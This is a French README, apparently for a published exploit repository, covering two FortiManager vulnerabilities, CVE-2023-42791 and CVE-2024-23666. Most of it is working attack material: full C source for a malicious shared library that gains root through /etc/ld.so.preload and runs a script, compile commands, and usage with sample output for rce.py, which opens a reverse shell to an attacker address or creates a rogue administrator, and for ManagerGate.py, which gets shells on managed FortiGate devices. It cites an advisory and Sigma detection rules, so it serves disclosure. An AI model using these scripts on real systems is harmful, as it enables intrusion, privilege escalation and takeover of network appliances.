
Scripts d'exploitation pour CVE-2023-42791 et CVE-2024-23666.
Deux scripts d'exploitation utilisant ces vulnérabilités sont fournis :
rce.py : Fournit un reverse shell ou ajoute un administrateur arbitraire à partir d'un accès non privilégié au FortiManager.ManagerGate.py : Permet de se connecter aux services SSH FortiGate gérés à distance. Les mots de passe SSH sont toujours nécessaires mais peuvent être trouvés dans la sauvegarde de configuration du FortiManager.Pour plus de détails, veuillez consulter l'avis associé disponible sur https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities
Compilez une bibliothèque malveillante qui exécutera /rce.sh :
$ cat rce.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
if (getuid() != 0) return 0;
unlink("/etc/ld.so.preload");
if (fork() == 0) {
setgid(0);
setuid(0);
system("/bin/bash /rce.sh");
}
return 0;
}
$ gcc -fPIC -shared -o rce.so rce.c -nostartfiles
Utilisation :
$ python3 rce.py -h
usage: rce.py [-h] [-k] [-l LIBRARY] connection {revshell,adduser} ...
positional arguments:
connection User, password, and host (user:password@host)
options:
-h, --help show this help message and exit
-k, --insecure Do not check the remote host certificate (default: False)
-l LIBRARY, --library LIBRARY
Malicious library path (default: /tmp/rce.so)
Action to run:
{revshell,adduser}
revshell Run a Python reverse shell
adduser Create a new administrator
Pour obtenir un reverse shell :
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] revshell 10.10.10.100 1234
[+] Login to the FortiManager
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
Pour ajouter un nouvel administrateur au FortiManager :
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] adduser malicious_adm password
[+] Login to the FortiManager
[+] Uploading /create_user.txt
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
$ python3 ManagerGate.py -h
usage: ManagerGate.py [-h] -H HOST -u USER -p PASSWORD [-d DEVICEID] [-i TUNNELIP] [-l] [-x PROXY] -U GU [-v VERBOSE]
get a shell on fortigate
options:
-h, --help show this help message and exit
-H HOST, --host HOST host of the fortimanager
-u USER, --user USER user to connect with to the fortimanager
-p PASSWORD, --password PASSWORD
password to connect to the fortimanager
-d DEVICEID, --deviceid DEVICEID
device oid to get shell
-i TUNNELIP, --tunnelip TUNNELIP
tunnel ip of the fortigate
-l, --local local connect to fortimanager
-x PROXY, --proxy PROXY
proxy request
-U GU, --gu GU user to connect with to the fortigate
-v VERBOSE, --verbose VERBOSE
Exemple
$ python3 ManagerGate.py -H 10.0.0.1 -u ReadOnlyUser -p MyPassword123 -d 1011 -i 169.254.0.2 -U root
L'OID de l'appareil et l'adresse IP du tunnel des FortiGates ciblés peuvent être trouvés sur l'interface graphique du FortiManager.
Les règles de détection Sigma visant à détecter l'utilisation de ces scripts d'exploitation sont disponibles dans le dépôt de règles de Synacktiv : https://github.com/synacktiv/synacktiv-rules/tree/main/2025/fortimanager